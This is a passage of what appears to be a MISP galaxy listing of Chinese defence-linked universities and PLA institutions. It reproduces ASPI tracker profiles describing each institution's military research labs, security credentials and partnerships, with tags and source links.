(海洋信息获取与安全工业和信息化部重点实验室) of Harbin Engineering University (HEU). The Naval Research Academy’s Liu Qingyu (刘清宇) was reported to have made a presentation on international and domestic developments in marine sonar technology at the conference.Liu Qingyu from the Naval Research Academy has a particularly strong record of engagement with civilian and military institutions for his research into marine sonar technology. In 2018, Liu delivered a presentation to the Northwestern Polytechnical University (NPU) which ‘elaborated on some of the problems facing the national costal defence industry’ and ‘suggested areas for future research into marine acoustics.’ Both students and academics from NPU attended Liu’s presentation. Liu has also published papers on acoustic science with scholars from the Chinese Academy of Sciences, the Naval University of Engineering, and Northwestern Polytechnical University.

The tag is: misp-galaxy:china-defence-universities="Naval Research Academy (中国人民解放军海军研究院)"

Table 923. Table References

Links

https://unitracker.aspi.org.au/universities/naval-research-academy

Naval University of Engineering (中国人民解放军海军工程大学)

NUE is one of the PLA’s five comprehensive universities, which trains students in a variety of engineering and core military disciplines related to naval warfare.The university is home two national laboratories. The National Key Laboratory for Vessel Integrated Power System Technology (舰船综合电力技术国防科技重点实验室), which was established in 2010 to carry out ‘indigenous research and development’ into integrated electric propulsion (IEP) systems that power naval vessels at sea. IEP generally uses diesel generators and/or gas turbines to generate the electricity needed in order to turn propellers on large surface vessels such as guided missile destroyers or amphibious assault ships. The lab is jointly run by NUE and China Shipbuilding Industry Corporation’s (CSIC) 712th Research Institute.Rear Admiral Ma Weiming has led the National Key Laboratory for Vessel Integrated Power System Technology to develop propulsion systems for aircraft catapults, electromagnetic weapons and satellite launches. Admiral Ma has been referred to as ‘the father of China’s electromagnetic catapult system’ (中国电磁弹射之父) by official Chinese media sources.NUE’s National Defense Technology Key Laboratory of Marine Vibration and Noise (船舶振动噪声国防科技重点实验室) works on acoustic quieting technology for submarines. The lab is probably jointly run with CSIC’s 701st Research Institute, also known as China Ship Development and Design Center (中国舰船研究设计中心).Another laboratory that conducts defence research at NUE is the Nuclear Marine Propulsion Engineering Military Key Laboratory (舰船核动力工程军队重点实验室). The lab focuses on researching and training engineers in nuclear engineering for warships and submarines.Academic departments at the Naval University of Engineering include:

The tag is: misp-galaxy:china-defence-universities="Naval University of Engineering (中国人民解放军海军工程大学)"

Table 924. Table References

Links

https://unitracker.aspi.org.au/universities/naval-university-of-engineering

Navy Aviation University (中国人民解放军海军航空大学)

The Navy Aviation University was established upon the merger of the Naval Aviation Pilot Academy and the Naval Aviation Engineering University during Xi Jinping’s military reforms in 2017. The university conducts research into missile engineering, electrical engineering and automation, navigation engineering as well as air station management engineering and flight vehicle design engineering. Academic articles published by the university have looked at topics such as the PLA-N’s combat system capability and naval aviation management systems. 

The tag is: misp-galaxy:china-defence-universities="Navy Aviation University (中国人民解放军海军航空大学)"

Table 925. Table References

Links

https://unitracker.aspi.org.au/universities/navy-aviation-university

Navy Logistics Academy (中国人民解放军海军勤务学院)

The Navy Logistics Academy is an institution devoted to training naval cadets and officers specialising in logistics. The academy’s core training and research focuses on military studies, management science and economics, while specialist lines of research include logistics command management and military financial auditing. The Center for Naval Analyses (CNA) in Arlington, Virginia have noted that entry into the academy tends to occur at the mid-career level for officers in the PLA-N.

The tag is: misp-galaxy:china-defence-universities="Navy Logistics Academy (中国人民解放军海军勤务学院)"

Table 926. Table References

Links

https://unitracker.aspi.org.au/universities/navy-logistics-academy

Navy Medical University (中国人民解放军海军军医大学)

The PLA Navy Medical University, formerly known as the Second Military Medical University, was established in 1951 as a university focussed on medical research for the Chinese military.

The tag is: misp-galaxy:china-defence-universities="Navy Medical University (中国人民解放军海军军医大学)"

Table 927. Table References

Links

https://unitracker.aspi.org.au/universities/navy-medical-university

Navy Submarine Academy (中国人民解放军海军潜艇学院)

The Navy Submarine Academy is responsible for the training of submariners to crew its conventionally and nuclear-powered submarines. The academy focuses its research on subjects such as electrical and information engineering, combat simulation, underwater acoustic engineering and navigation technology along with weapons systems and launch engineering and underwater ordnance technology. The academy also offers programs in combat tactics and the underwater combat environment.The Navy Submarine Academy pursues research that may contribute to Chinese anti-submarine warfare capabilities through the Underwater Operational Environment Military Key Laboratory (水下作战环境军队重点实验室). The academy also oversees part of the  The publication record of researchers from the Navy Submarine Academy also suggests a strong interest in foreign developments in undersea warfare systems.  In 2018, the Navy Submarine Academy signed a cooperative agreement with Harbin Engineering University (HEU). The agreement is directed at promoting research collaboration in subjects such as big data fusion, intelligent navigation, underwater acoustic target recognition, and underwater unmanned intelligent control systems.

The tag is: misp-galaxy:china-defence-universities="Navy Submarine Academy (中国人民解放军海军潜艇学院)"

Table 928. Table References

Links

https://unitracker.aspi.org.au/universities/navy-submarine-academy

North China Institute of Aerospace Engineering (北华航天工业学院)

NCIAE specialises aerospace technology and engineering. The university is primarily run by the Hebei Provincial Government, together with the State Administration of Science, Technology and Industry for National Defense, China Aerospace Science and Technology Corporation (CASC), and China Aerospace Science and Industry Corporation (CASIC).NCIAE appears to be a major training center for CASC and CASIC, state-owned defence conglomerates that dominate China’s missile and satellite sector. NCIAE runs at least two research and development centres with CASC and was involved in the development of the Shenzhou spacecraft, Long March rockets and the DFH-5 satellite platform.In 2003, the Hebei Provincial Government, CASC and CASIC signed an agreement to jointly support NCIAE (pictured below, courtesy of NCIAE).

The tag is: misp-galaxy:china-defence-universities="North China Institute of Aerospace Engineering (北华航天工业学院)"

Table 929. Table References

Links

https://unitracker.aspi.org.au/universities/north-china-institute-of-aerospace-engineering

North China University of Science and Technology (华北理工大学)

NCST was founded in 2010 and focuses on metallurgy and materials science. The university engages in growing levels of defence research since coming under the supervision of defence industry agency SASTIND in 2013.‘Military-use critical materials’ has been designated as a key defence research area at NCST.

The tag is: misp-galaxy:china-defence-universities="North China University of Science and Technology (华北理工大学)"

Table 930. Table References

Links

https://unitracker.aspi.org.au/universities/north-china-university-of-science-and-technology

North University of China (中北大学)

NUC is a civilian university that specailises in defence research. It is jointly administered by the Shanxi Provincial Government and defence industry agency SASTIND. The university traces its roots back to an ordnance school established by the Eighth Route Army in 1941, and defence research is central to its identity. According to NUC’s website, ‘Our university has long established excellent and cooperative relationships with Central Military Commission departments, SASTIND, Norinco Group, China South Industries Group, China Aerospace Science and Technology Group, China Aerospace Science and Industry Group, and our graduates are spread across different areas in defence industry.’ Approximately 2000 of its graduates enter the defence industry each year.NUC specialises in testing and developing weapons, including tanks, missiles and explosives. Its Underground Target Damage Technology National Defense Key Subject Laboratory reportedly runs the only underground shooting range in a Chinese university. The university is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器).

The tag is: misp-galaxy:china-defence-universities="North University of China (中北大学)"

Table 931. Table References

Links

https://unitracker.aspi.org.au/universities/north-university-of-china

Northeastern University (东北大学)

NEU is a major civilian university subordinate to the Ministry of Education. The university hosts three national laboratories, all of which are related to industrial manufacturing technology.NEU engages in growing levels of defence research. It holds secret-level security credentials allowing it to participate in classified weapons projects and hosts the defence-focused Key Laboratory of Aerodynamic Equipment Vibration and Control. In 2018, NEU was approved to build a further five laboratories that could be involved in future defence or security-related research.In 2019, NEU joined the Shenyang Aircraft Design Institute Collaborative Innovation Alliance (沈阳飞机设计研究所协同创新联盟), a group of universities and institutes, led by defence conglomerate AVIC, that are involved in the development of military aircraft. NEU also runs a National Defense Science and Technology Development Research Institute (国防科技发展研究院). In 2019, the institute’s senior deputy director was awarded a China Industry-University-Research Cooperation Military-Civil Fusion Prize.

The tag is: misp-galaxy:china-defence-universities="Northeastern University (东北大学)"

Table 932. Table References

Links

https://unitracker.aspi.org.au/universities/northeastern-university

Northwest Institute of Nuclear Technology (西北核技术研究所)

NINT is one of China’s main sites of nuclear technology research. While the Chinese Academy of Engineering Physics is believed to be China’s only manufacturer of nuclear warheads, NINT likely plays a supporting role in research for nuclear weapons. It is especially active in research on lasers, which can be used in nuclear fusion reactors or weapons. Aside from nuclear technology, NINT carries out research on topics including electronics, information science, materials science, control science and chemistry.NINT has partnerships with several institutes in the Chinese Academy of Sciences, Xiangtan University, Northwestern Polytechnical University, and Xi’an Jiaotong University.

The tag is: misp-galaxy:china-defence-universities="Northwest Institute of Nuclear Technology (西北核技术研究所)"

Table 933. Table References

Links

https://unitracker.aspi.org.au/universities/northwest-institute-of-nuclear-technology

Northwestern Polytechnical University (西北工业大学)

The university is one of the ‘Seven Sons of National Defence’ subordinate to MIIT. It is heavily engaged in military research, describing itself as ‘devoted to improving and serving the national defence science and technology industry.’ NWPU’s research focuses on aviation, space and naval technology.  Between 2014 and 2018, the university’s School of Mechanics, Civil Engineering and Architecture alone spent nearly RMB200 million (AUD40 million) on defence research projects. 41.25% of 2017 NWPU graduates who gained employment were working in the defence sector.NWPU is known for its development of unmanned aerial vehicles (UAVs). The only Chinese university hosting a UAV defence laboratory, NWPU produces the ASN series of UAVs though its subsidiary company, Aisheng Technology Group Co., Ltd. The Chinese military is the company’s largest customer and the company once claimed to produce 90% of China’s drones.The university has close ties to state-owned shipbuilding and aerospace conglomerates.

The tag is: misp-galaxy:china-defence-universities="Northwestern Polytechnical University (西北工业大学)"

Table 934. Table References

Links

https://unitracker.aspi.org.au/universities/northwestern-polytechnical-university

Officers College of the PAP (中国人民武装警察部队警官学院)

The Officers College of the PAP was established as an institution devoted to training officers of China’s paramilitary service in command and engineering disciplines. The college’s research focusses on combat command, command information systems engineering, philosophy, law, political education, Chinese language and literature, history, mathematics, physics, applied psychology, electrical science and technology, computer science and technology, and management science and engineering.The Officers College of the PAP is especially active in developing drone technology. On 26 June 2019, the college tested its X-Swift unmanned aerial vehicles (UAV) for a test surveillance and reconnaissance flight with special operations personnel in Sichuan.The college is also active in developing applications for drone technology. Researchers from the college have collaborated with personnel from the PLA Logistics Engineering University to publish an article in favour of deploying UAVs to southern Xinjiang for counter-terrorism missions. The researchers argue for UAVs to be deployed for regional surveillance and strike as well as search and seizure missions in Xinjiang, drawing off lessons from the US coalition against ISIS.

The tag is: misp-galaxy:china-defence-universities="Officers College of the PAP (中国人民武装警察部队警官学院)"

Table 935. Table References

Links

https://unitracker.aspi.org.au/universities/officers-college-of-the-pap

PAP NCO College (中国人民武装警察部队士官学校)

The PAP NCO College was established in 2017 following Xi Jinping’s reforms to China’s military education system. The college does not appear to engage in significant levels of defence research and focuses its attention on training enlisted personnel in China’s paramilitary service, the People’s Armed Police.

The tag is: misp-galaxy:china-defence-universities="PAP NCO College (中国人民武装警察部队士官学校)"

Table 936. Table References

Links

https://unitracker.aspi.org.au/universities/pap-nco-college

Peking University (北京大学)

PKU is considered among China’s most prestigious universities with a storied history. It is ranked as one of China’s top two academic institutions, along with Tsinghua University. Unsurprisingly, the university has been included in a number of the PRC’s educational initiatives, including as a Class A institution under the Double First-Class University program.PKU has been subject to at least two joint-supervision agreements between the Ministry of Education and defence industry agency SASTIND. These agreements, signed in 2012 and 2016, are designed to deepen the university’s involvement in defence research.PKU’s Advanced Technology Institute was founded in 2006 to oversee and develop the university’s defence research. Includes several research centres and supervises the university’s four major defence laboratories. The institute’s research covers semiconductors, nuclear technology, quantum physics, advanced materials, underwater acoustics, satellite navigation and communications, flight propulsion, aerospace engineering and microprocessors.In 2017, PKU and the Chinese Academy of Engineering Physics (CAEP)—China’s nuclear weapons program—established the PKU–CAEP New Structure Center for Applied Physics and Technology (北京大学-中国工程物理研究院新体制应用物理与技术研究中心).. The institution was founded on the basis of the PKU Center for Applied Physics and Technology (北京大学应用物理与技术研究中心) established with CAEP in 2007. The joint centre carries out research on materials, lasers for atomic physics applications, laser plasma physics, computer science and fluid dynamics. PKU’s report on the centre notes that it will serve China’s national defence needs and that CAEP’s deputy director emphasised it should ‘take the path of military-civil fusion’. The joint centre’s honorary director and founding director, He Xiantu, is credited as the developer of China’s first neutron bomb.PKU takes precautions for the protection of classified information. The university has an office devoted to the secure handling of classified information, hosting regular meetings and training sessions to strengthen the university’s security culture. In 2006, the university received security credentials for participation in classified defence research.

The tag is: misp-galaxy:china-defence-universities="Peking University (北京大学)"

Table 937. Table References

Links

https://unitracker.aspi.org.au/universities/peking-university

People’s Armed Police Command College (中国人民武装警察指挥学院)

The PAP Command College is an institution devoted to training officers in China’s paramilitary service, the People’s Armed Police, that was established in 1984. The college’s key subjects focus on law, engineering, military studies and management studies, but most attention is devoted to paramilitary training and political work. The PAP Command College maintains a focus on paramilitary training, but it does retain a scientific research program.Drone technology is another area of interest for the PAP Command College. The college was involved in testing the X-Swift unmanned aerial vehicle (UAV) in June 2019. Kang Jian from the college’s Scientific Research Department also attended the 2017 Drone World Congress hosted in Shenzhen.

The tag is: misp-galaxy:china-defence-universities="People’s Armed Police Command College (中国人民武装警察指挥学院)"

Table 938. Table References

Links

https://unitracker.aspi.org.au/universities/peoples-armed-police-command-college

People’s Public Security University of China (中国人民公安大学)

PPSUC was founded in July 1948. In 1984, it was developed into a full-time higher education institution with master’s and bachelor’s degree programs. In 1998, it was merged with the Chinese People’s Police University (中国人民警官大学). Its schools include a Marxism School, Law School, Law and Order School, Investigation and Anti-Terrorism School, Criminology School, Pubic Security Management School, International Policing and Law Enforcement School, Police Training College (which covers combat training and command and tactical training), Criminal Science and Technology School, Information Technology and Network Security School, and a Traffic Management School.PPSUC is involved in the development of technological tools for public security applications, including image recognition. For instance, the university signed an agreement with Chinese video surveillance equipment manufacturer Hikvision in 2016 to set up a joint laboratory on video image recognition technology. In 2018, it signed a strategic cooperation agreement with Xiamen Meiya Pico Information Co., a Chinese company that provides digital forensics and information security products, which included upgrading a forensics laboratory and establishing a cyber security attack and defence laboratory.The university also has cooperation agreements with numerous local government-level public security bureaus across the PRC. These include agreements on image recognition technology for local public security bureaus and joint laboratories. For instance, in 2018 alongside the Nanshan sub-bureau of Shenzhen Public Security Bureau and the artificial intelligence companies SenseTime and Shenzhen Yuantian Lifei, it signed a strategic cooperation agreement on applying video recognition and the establishment of a joint laboratory.

The tag is: misp-galaxy:china-defence-universities="People’s Public Security University of China (中国人民公安大学)"

Table 939. Table References

Links

https://unitracker.aspi.org.au/universities/peoples-public-security-university-of-china

Railway Police College (铁道警察学院)

The Railway Police College is China’s only institution of higher learning devoted to training specialists responsible for securing the Chinese railway network. In 2017, the college graduated over 1,000 personnel trained in disciplines such as surveillance studies, political security studies and safety management studies.

The tag is: misp-galaxy:china-defence-universities="Railway Police College (铁道警察学院)"

Table 940. Table References

Links

https://unitracker.aspi.org.au/universities/railway-police-college

Renmin University (人民大学)

Renmin University is subordinate to the Ministry of Education and also supported by the Beijing Municipal Government. Its focus is in the humanities and social sciences. Although the university does not appear to have ties with the national defense industry, it was placed on the US Government’s Unverified List in April 2019, which places restrictions on US exports to the university. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Renmin University (人民大学)"

Table 941. Table References

Links

https://unitracker.aspi.org.au/universities/renmin-university

Rocket Force Command College (中国人民解放军火箭指挥学院)

The Rocket Force Command College is the PLA’s premier institute devoted to training cadets and early-to-mid career officers in conventional and nuclear missile campaigns. Candidates require understanding of battlefield command, management and campaign tactics prior to entry into the college. The college then builds on this knowledge by providing specialist training for missile campaigns.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Command College (中国人民解放军火箭指挥学院)"

Table 942. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-command-college

Rocket Force Research Institute (中国人民解放军火箭军研究院)

The Rocket Force Research Institute develops nuclear and conventional ballistic missiles, carrying out research on warhead, guidance and control technology. It appears to be the successor to the PLA Second Artillery Equipment Academy (火箭军装备研究院) and the Rocket Force Equipment Academy (火箭军装备研究院). The institute reportedly hosts two national-level defence laboratories. It also has a strategic cooperation agreement with Beijing Institute of Technology, which hosts two state key laboratories that study impacts and explosions.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Research Institute (中国人民解放军火箭军研究院)"

Table 943. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-research-institute

Rocket Force Sergeant School (中国人民解放军火箭军士官学校)

The Rocket Force Officer College is an institution devoted to training military personnel for China’s tactical and strategic missile forces that was established after Xi Jinping’s military reforms in 2017. The college’s focus is on providing technical training to personnel in the PLARF’s missile systems. However, the college has also produced research on underground engineering which would be useful to hardening bases for missile strikes.

The tag is: misp-galaxy:china-defence-universities="Rocket Force Sergeant School (中国人民解放军火箭军士官学校)"

Table 944. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-sergeant-school

Rocket Force University of Engineering (中国人民解放军火箭军工程大学)

RFUE is the PLA strategic missile force’s leading institution for training technical and scientific talent. Students entering the university tend to be university graduates and career members of the PLA Rocket Force.Defence research conducted by the RFUE focuses on building resilience and capabilities for conventional and nuclear missile strikes. RFUE hosts the Missile Testing and Control Virtual Simulation Experimental Teaching Center (导弹测试与控制虚拟仿真实验教学中心).The university’s key areas of research include:

The tag is: misp-galaxy:china-defence-universities="Rocket Force University of Engineering (中国人民解放军火箭军工程大学)"

Table 945. Table References

Links

https://unitracker.aspi.org.au/universities/rocket-force-university-of-engineering

Shandong University (山东大学)

SDU is subordinate to the Ministry of Education. Since 2016, it has also been supervised by defence industry agency SASTIND as part of a program to expand universities’ involvement in defence research and training.SDU has pursued greater involvement in defence research since at least 2006, when it established a national defence research institute to coordinate relevant work across the university. Shortly afterwards, it received secret-level security credentials allowing it to participate and research and production for classified weapons and defence technology projects. In 2008, it was recognised as one of Shandong Province’s 10 outstanding defence industry units.SDU collaborates with the Chinese Academy of Engineering Physics, China’s nuclear warheads development facility, on topics including the development of crystals that are used in the study of nuclear explosions and research on fusion ignition.

The tag is: misp-galaxy:china-defence-universities="Shandong University (山东大学)"

Table 946. Table References

Links

https://unitracker.aspi.org.au/universities/shandong-university

Shandong University of Technology (山东理工大学)

SDUT specialises in engineering and carries out growing levels of defence research. In 2018, SDUT became the only university in Shandong Province jointly supervised by defence industry agency SASTIND besides Shandong University.  This indicates that SDUT’s involvement in defence research and links to the defence industry will grow in coming years.SASTIND has specifically indicated its intention to build up advanced materials and advanced manufacturing technology as areas of defence research at SDUT. SDUT has carried out research on mechatronic engineering for the defence industry, and developed a non-destructive testing system for ceramic antenna covers on missiles.

The tag is: misp-galaxy:china-defence-universities="Shandong University of Technology (山东理工大学)"

Table 947. Table References

Links

https://unitracker.aspi.org.au/universities/shandong-university-of-technology

Shanghai Jiao Tong University (上海交通大学)

SJTU is directly under the administration of the MOE. In 2016 it also came under the supervision of defence industry agency SASTIND as part of a ‘joint construction’ agreement between the MOE and SASTIND.The university has at least three laboratories focused on defense research relating to materials science, ships and hydrodynamics. The defence labs have established substantial collaborative research and talent development relationships with hydrodynamics research groups at universities including MIT, Cornell, and the Danish Technical University.One of the university’s strongest departments is computer science. Its computer science program has garnered support from American tech companies such as Cisco Systems and Microsoft, which collaborated on establishing a laboratory for intelligent computing and intelligent systems at the university. In particular, the School of Information Security Engineering, has ties to the PLA through its dean and chief professor who both previously worked for the PLA. SJTU also has ties to the PLA Unit 61398, a cyber espionage unit that has been implicated in cyber attacks on the United States.SJTU is also known for its involvement in maritime research. The School of Naval Architecture, Ocean & Civil Engineering cooperates extensively with other universities from around the world as well as with many domestic industrial enterprises, such as defence conglomerate CSIC and CASC. The school is the lead unit of the High-tech Ship and Deep-Sea Development Equipment Collaborative Innovation Center (高新船舶与深海开发装备协同创新中心), where it has contributed to assisting the PLA Navy’s transition to offshore defense operations.

The tag is: misp-galaxy:china-defence-universities="Shanghai Jiao Tong University (上海交通大学)"

Table 948. Table References

Links

https://unitracker.aspi.org.au/universities/shanghai-jiaotong-university

Shanghai University (上海大学)

SHU is engaged in growing levels of defence research. In 2016, the Shanghai Municipal Government and defence industry agency SASTIND agreed to jointly supervise and support its participation in defence research.Shanghai University has begun building up its capability in defence research in areas such as unmanned surface vehicles, materials for missiles, and microwave technology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.Shanghai University’s Research Institute of Unmanned Surface Vehicle Engineering researches and produces unmanned surface vessels, some of which are for the China Maritime Safety Administration.

The tag is: misp-galaxy:china-defence-universities="Shanghai University (上海大学)"

Table 949. Table References

Links

https://unitracker.aspi.org.au/universities/shanghai-university

Shenyang Aerospace University (沈阳航空航天大学)

SAU is the only university formally under the supervision of China’s military aircraft manufacturer, AVIC. SAU engages in high levels of defence research and describes itself as a base for training talent in national defence science and technology. Serving China’s military aviation industry is what SAU refers to as its ‘glorious tradition’.Many of China’s military aircraft are designed and built in Shenyang, which is home to AVIC subsidiaries Shenyang Aircraft Design Institute and Shenyang Aircraft Corporation. SAU and AVIC work closely together, including through a joint research institute.

The tag is: misp-galaxy:china-defence-universities="Shenyang Aerospace University (沈阳航空航天大学)"

Table 950. Table References

Links

https://unitracker.aspi.org.au/universities/shenyang-aerospace-university

Shenyang Ligong University (沈阳理工大学)

SYLU is a civilian university that specialises in defence research. The university’s primary areas of defence research are armament science, information and communications engineering, control science, materials science and mechanical engineering. Apart from Xi’an Technological University, SYLU is the only Chinese civilian university supervised by state-owned arms manufacturers Norinco Group and China South Industries Group. In 2016, it also came under the supervision of defence industry agency SASTIND.SYLU is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). The university runs a weapons museum on its campus. Furthermore, SYLU is a member of the Liaoning Military-Civil Fusion Arms Industry-College Alliance (辽宁军民融合(兵工)产业校企联盟) and SYLU’s president doubles as chairman of the alliance. This indicates close ties between SYLU and China’s arms industry.

The tag is: misp-galaxy:china-defence-universities="Shenyang Ligong University (沈阳理工大学)"

Table 951. Table References

Links

https://unitracker.aspi.org.au/universities/shenyang-ligong-university

Shenzhen University (深圳大学)

SZU is the primary university in China’s rapidly growing technology hub, Shenzhen. The university does not appear to engage in high levels of defence research outside of its national defence laboratory on automatic target recognition. The laboratory was founded in 2001, is overseen by the PLA and SASTIND, and is headed by the university’s former president.

The tag is: misp-galaxy:china-defence-universities="Shenzhen University (深圳大学)"

Table 952. Table References

Links

https://unitracker.aspi.org.au/universities/shenzhen-university

Shijiazhuang Tiedao University (石家庄铁道大学)

STDU specializes in transportation science, engineering and information technology. Its predecessor was the PLA Railway Engineering College.Since 2013, STDU has also been supervised by defence industry agency SASTIND through an arrangement designed to expand the university’s involvement in defense-related research and training.  STDU has secret-level security credentials, allowing it to participate in classified defense technology research.STDU is home to the National Defense Transportation Research Institute (国防交通研究所), which is the only civilian university research institute that specializes in national defense transportation research. STDU is also home to the Institute of Complex Networks and Visualisations (复杂网络与可视化研究所), which develops military-use information processing software including remote-control systems for aerospace applications.

The tag is: misp-galaxy:china-defence-universities="Shijiazhuang Tiedao University (石家庄铁道大学)"

Table 953. Table References

Links

https://unitracker.aspi.org.au/universities/shijiazhuang-tiedao-university

Sichuan University (四川大学)

Sichuan University (SCU) is a leading Chinese university subordinate to the Ministry of Education. In 2011 and again in 2016 SCU was the subject of joint construction agreements between the MOE and defence industry agency SASTIND designed to increase its involvement in defence research.The university hosts at least three laboratories that focus on defence research and has a close relationship with the Chinese Academy of Engineering Physics (CAEP), the PRC’s primary nuclear warheads research facility. SCU’s Institute of Atomic and Molecular Physics and CAEP jointly established the Institute of Atomic and Molecular Engineering and the Institute of High Temperature and High Pressure Physics. In 2012, SCU was added to the US BIS Entity List as an alias of CAEP, implying that it acts as a proxy for the facility.A 2011 study by American think tank Project 2049 concluded that a PLA signals intelligence unit ‘likely maintain a close, mutually supportive relationship with related organizations in Chengdu, such as Sichuan University’s Information Security and Network Attack and Defense Laboratory (四川大学信息安全及网络攻防研究室).’

The tag is: misp-galaxy:china-defence-universities="Sichuan University (四川大学)"

Table 954. Table References

Links

https://unitracker.aspi.org.au/universities/sichuan-university

Soochow University (苏州大学)

Soochow University has been jointly supervised by the Jiangsu Provincial Government and defence industry agency SASTIND since 2016. This arrangement is designed to expand the university’s involvement in defense-related research and training.The university has five designated defence disciplines, centred around research on radiation. In particular, its School of Radiation Medicine and Protection has strong defence links, as it has become a major teaching and research base for the nuclear industry.Suzhou University is also involved in promoting military-civil fusion. The university cooperated with Changfeng Science Technology Industry Group (a subsidiary of missile manufacturer CASC) and Suzhou Xinkuan Electronic Technology Co., Ltd. to jointly establish the ‘Suzhou University Military-Civil Fusion Internet of Things Collaborative Innovation Center.’

The tag is: misp-galaxy:china-defence-universities="Soochow University (苏州大学)"

Table 955. Table References

Links

https://unitracker.aspi.org.au/universities/soochow-university

South China University of Technology (华南理工大学)

SCUT is subordinate to the Ministry of Education and in 2018 was placed under a joint-construction agreement between the MOE and SASTIND. This arrangement is designed to develop the university’s involvement in defence-related research and training. SCUT also holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects. As a result of the university’s placement under joint construction and its secret-level security credentials, SCUT’s involvement in defence research is likely to grow in coming years.Since 2008, the university has hosted a defence research laboratory on materials science. The lab was initially run by the university’s president. In 2017, the university joined the Guangzhou Civil-Military Integration Industry Coalition. More recently in 2019, SCUT and iFlytek established an artificial intelligence company, Guangzhou Huanan Naokong Zhineng Keji Gongsi (广州华南脑控智能科技公司).

The tag is: misp-galaxy:china-defence-universities="South China University of Technology (华南理工大学)"

Table 956. Table References

Links

https://unitracker.aspi.org.au/universities/south-china-university-of-technology

Southeast University (东南大学)

SEU is a leading Chinese university that engages in high levels of defence research. In 2015, the university undertook RMB180m (AUD37m) of defence research projects, placing it among the Ministry of Education universities most involved in defence research. That figure has almost certainly grown since 2016, when SEU came under a ‘joint construction’ agreement between the Ministry of Education and defence industry agency SASTIND. The university has secret security credentials, enabling it to participate in secret defence projects.The university has also been linked to cyberespionage. Researchers at its School of Cyber Science and Engineering (网络空间安全学院) have been funded by the MSS, China’s civilian intelligence agency. The School of Cyber Science and Engineering has close ties to TopSec, a Chinese information security company that trains, recruits and works with PLA cyber security officers.SEU states that its defence research relies on its excellence in electronics. It has at least two laboratories that specialise in defence research on navigation technology and underwater acoustics. Both laboratories may be involved in developing technology for underwater warfare. Representatives from the PLA Navy’s Submarine Academy visited SEU in 2017.SEU has also built relationships with state-owned defence conglomerates. In 2017, the university signed a strategic cooperation agreement with missile-manufacturer China Aerospace Science and Industry Corporation. In 2018 and 2019, it signed similar agreements with subsidiaries of China Electronics Technology Group Corporation, China’s leading manufacturer of military electronics.

The tag is: misp-galaxy:china-defence-universities="Southeast University (东南大学)"

Table 957. Table References

Links

https://unitracker.aspi.org.au/universities/southeast-university

Southwest University of Science and Technology (西南科技大学)

SWUST is deeply engaged in defence research and is based in Mianyang, a city also home to China’s nuclear weapons program and many other parts of the defence industry. Since 2006, the university has been subject to several joint construction agreements between the Sichuan Provincial Government and SASTIND that are designed to increase its involvement in defence research.SWUST carries out defence-related research on nuclear waste, radiation protection and electronic information engineering. It holds secret-level security credentials, allowing it to undertake classified defence technology and weapons projects. The university’s main defence laboratory carries out research on topics such as the use of microorganisms to clean nuclear waste.SWUST has worked closely with the Chinese Academy of Engineering Physics (China’s nuclear warheads program), China Aerodynamics Research and Development Center (a PLA base specialising in aircraft design), and defence conglomerates since its establishment. The fact that the university hosts the province’s ‘Civil-military Integration Institute’ is a testament to its integration with the military and defence industry.

The tag is: misp-galaxy:china-defence-universities="Southwest University of Science and Technology (西南科技大学)"

Table 958. Table References

Links

https://unitracker.aspi.org.au/universities/southwest-university-of-science-and-technology

Space Engineering University (中国人民解放军战略支援部队航天工程大学)

SEU was established in June 2017 as an expansion of the former PLA Equipment Academy (装备学院). SEU describes itself as a ‘comprehensive university that trains talents for space command management and engineering.’ It is intended to serve as the ‘cradle of the new PLA’s space talent training.’ The SEU is subordinate to and supports the PLA Strategic Support Force’s Space Systems Department (航天系统部), which has taken over the space and potentially counterspace capabilities that were previously the purview of the former General Armaments Department and, to a lesser degree, the former General Staff Department.The SEU offers degree programs at the undergraduate, master’s, and doctoral levels, as well as programs for non-commissioned officers, across disciplines including space target surveillance, remote sensing science and technology, and aerospace information security. Its faculty include nine CMC Science and Technology Commission experts and twenty professors who are designated as expert defence science and technology advisors.Beyond its mission of talent cultivation, the SEU also engages in extensive research. In particular, the SEU has a total of eighteen laboratories, which include two national-level key laboratories and one military-level key laboratory.

The tag is: misp-galaxy:china-defence-universities="Space Engineering University (中国人民解放军战略支援部队航天工程大学)"

Table 959. Table References

Links

https://unitracker.aspi.org.au/universities/space-engineering-university

Special Police Academy (中国武装警察部队特种警察学院)

SPA is made up of departments for training, political work and logistics. As such, SPA engages in little defence research and focusses its activities on training special operations paramilitary troops in command processes.

The tag is: misp-galaxy:china-defence-universities="Special Police Academy (中国武装警察部队特种警察学院)"

Table 960. Table References

Links

https://unitracker.aspi.org.au/universities/special-police-academy

Sun Yat-sen University (中山大学)

SYSU is a leading Chinese university subordinate to the Ministry of Education. In 2018, it come under the joint supervision of MOE and defence industry agency SASTIND. This development indicates that SYSU’s involvement in the defence industry and defence research is growing.The university has a large defence research budget. In 2018, it spent nearly RMB200 million (AUD41 million) on defence research out of its total research budget of RMB3.1 billion (AUD640 million).SYSU is linked to the Chinese military through its National Supercomputer Center in Guangzhou (国家超级计算广州中心), which was placed on the US Government Entity List in 2015 for its role in nuclear weapons development. The centre was jointly established with the PLA National University of Defense Technology in 2011 to host the Tianhe-2 supercomputer. The supercomputer is operated by the National University of Defense Technology and was the world’s fastest from 2013 to 2015.Aside from the supercomputer center, SYSU’s Key Laboratory of Information Science is the only known lab focused on defence research and is located within the School of Electronics and Information Technology.In 2010, the university established a State Secrets Academy (国家保密学院), serving as the third university in China to establish such an institute in partnership with China’s National Administration of State Secrets Protection (国家保密局). The Institute carries out research and training on the protection of state secrets.

The tag is: misp-galaxy:china-defence-universities="Sun Yat-sen University (中山大学)"

Table 961. Table References

Links

https://unitracker.aspi.org.au/universities/sun-yat-sen-university

